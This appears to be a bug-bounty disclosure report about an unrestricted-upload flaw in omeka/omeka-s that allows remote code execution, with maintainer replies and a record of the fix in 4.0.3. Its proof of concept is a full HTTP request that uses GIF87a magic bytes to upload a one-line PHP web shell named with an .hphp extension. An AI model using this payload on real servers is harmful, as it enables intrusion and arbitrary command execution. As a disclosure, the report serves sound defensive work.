Unrestricted Upload File leads to Remote Code Execution in omeka/omeka-s

Valid

Reported on

Aug 2nd 2023


Description

The upload file function is vulnerable that user can upload the file with other extensions (.php, .phps, ...) by using Magic Bytes technique. However, the .htaccess has almost prevented all the files with extensions such as php, phps, phtml, ... The attacker still can upload the hphp file and then execute code from a remote machine.

Condition

The Apache server which is hosting the web application need to have the ability to execute the hphp file

Proof of Concept

Step 1: Login and go to the function that allows uploading, intercept the request, and modify as below

POST /omeka-s/admin/asset/add HTTP/1.1
Host: localhost
Content-Length: 344
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="104"
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9KHufs2z61gFOMA6
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/omeka-s/admin/asset
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: b8bc1e26ae4f54844a68a1cc98faa75a=lner6c64iimgk1pj70i6ikanpi
Connection: close

------WebKitFormBoundary9KHufs2z61gFOMA6
Content-Disposition: form-data; name="file"; filename="shell_php.hphp"
Content-Type: application/octet-stream

GIF87a <?php echo system($_REQUEST['cmd']);?>
------WebKitFormBoundary9KHufs2z61gFOMA6
Content-Disposition: form-data; name="o:alt_text"


------WebKitFormBoundary9KHufs2z61gFOMA6--

With the Magic Bytes GIF87a, the attacker has bypassed the file check, and then he can upload the file (.hphp) which is not in the whitelist.

Step 2: Check the file path

Step 3: Access the file path and execute commands

Impact

An attacker could use this vulnerability to get code execution on the victim machine

We are processing your report and will contact the omeka/omeka-s team within 24 hours. 7 months ago
John Flatness
7 months ago

Maintainer


Are there really servers out there with "phpx" configured to execute PHP? I've never seen one.

tuannq2299
7 months ago

Researcher


My mistake, there are servers with "hphp", "ctp" configured to execute PHP not "phpx". You can view it here Reference I updated the PoC

tuannq2299 modified the report
7 months ago
tuannq2299 modified the report
7 months ago
We have contacted a member of the omeka/omeka-s team and are waiting to hear back 7 months ago
John Flatness
7 months ago

Maintainer


.ctp seems to be something CakePHP uses: I don't know that any servers execute it with that extension. Though do correct me if you know otherwise.

.hphp is HipHop/HHVM stuff... HHVM usage for PHP is basically dead, but that's incrementally more likely to be a configuration that exists somewhere, I suppose.

Ultimately the "main" fix here is going to be whitelisting asset uploads for extension alongside the mimetype check they already do.

John Flatness validated this vulnerability 7 months ago
tuannq2299 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
tuannq2299
7 months ago

Researcher


Can you assign a CVE-ID for this vulnerability?

John Flatness marked this as fixed in 4.0.3 with commit 2a7fb2 6 months ago
The fix bounty has been dropped
This vulnerability has now been published 6 months ago
to join this conversation